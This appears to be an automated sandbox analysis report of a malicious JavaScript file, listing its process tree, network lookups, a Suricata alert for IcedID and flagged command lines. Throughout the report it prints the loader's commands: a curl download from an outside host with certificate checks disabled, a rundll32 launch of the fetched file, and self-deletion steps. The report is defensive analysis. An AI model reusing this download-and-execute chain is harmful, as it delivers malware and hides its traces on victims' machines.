Document_Scan_463.js| Category | Machine | Started | Completed |
|---|---|---|---|
| FILE | s1_win7_x6403_us | Aug. 31, 2023, 10:40 a.m. | Aug. 31, 2023, 10:42 a.m. |
-
wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Document_Scan_463.js
1488-
cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_463.js"
2156 -
cmd.exe "C:\Windows\System32\cmd.exe" /c echo curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\expedita.g.bat"
2204 -
-
curl.exe curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" --ssl-no-revoke --insecure --location
2392
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" "expedita.g"
2460 -
rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\expedita.g", scab /k arabika752
2528-
rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\expedita.g", scab /k arabika752
2640
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\expedita.g.bat"
2568
-
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| moashraya.com | 184.168.117.217 | |
| oopscokir.com | 172.67.179.217 |
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.103:49175 -> 172.67.179.217:80 | 2032086 | ET MALWARE Win32/IcedID Request Cookie | A Network Trojan was detected |
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLS 1.2 192.168.56.103:49169 184.168.117.217:443 |
C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority | CN=moashraya.com | f5:4f:f0:43:5d:87:29:b9:67:28:34:e9:f9:c2:a3:5d:38:79:d1:55 |
| suspicious_features | GET method with no useragent header | suspicious_request | GET http://oopscokir.com/ | ||||||
| request | GET http://oopscokir.com/ |
| file | C:\Users\test22\AppData\Local\Temp\expedita.g.bat |
| cmdline | cmd.exe /c echo curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\expedita.g.bat" |
| cmdline | "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\expedita.g.bat" |
| cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\expedita.g.bat" |
| cmdline | cmd.exe /c "C:\Users\test22\AppData\Local\Temp\expedita.g.bat" |
| cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_463.js" |
| cmdline | cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" "expedita.g" |
| cmdline | "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" "expedita.g" |
| cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_463.js" |
| cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\expedita.g.bat" |
| cmdline | "C:\Windows\System32\cmd.exe" /c echo curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\expedita.g.bat" |
| cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\expedita.g.bat" |
| cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_463.js" |
| cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_463.js" |
| cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\expedita.g.bat" |
| parent_process | wscript.exe | martian_process | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_463.js" | ||||||
| parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\expedita.g.bat" | ||||||
| parent_process | wscript.exe | martian_process | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\expedita.g.bat" | ||||||
| parent_process | wscript.exe | martian_process | cmd.exe /c "C:\Users\test22\AppData\Local\Temp\expedita.g.bat" | ||||||
| parent_process | wscript.exe | martian_process | cmd.exe /c echo curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\expedita.g.bat" | ||||||
| parent_process | wscript.exe | martian_process | rundll32 "C:\Users\test22\AppData\Local\Temp\expedita.g", scab /k arabika752 | ||||||
| parent_process | wscript.exe | martian_process | cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" "expedita.g" | ||||||
| parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" "expedita.g" | ||||||
| parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_463.js" | ||||||
| parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\expedita.g.bat" | ||||||
| parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c echo curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\expedita.g.bat" | ||||||
| parent_process | wscript.exe | martian_process | "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\expedita.g", scab /k arabika752 | ||||||
| file | C:\Windows\System32\cmd.exe |
| file | C:\Windows\System32\rundll32.exe |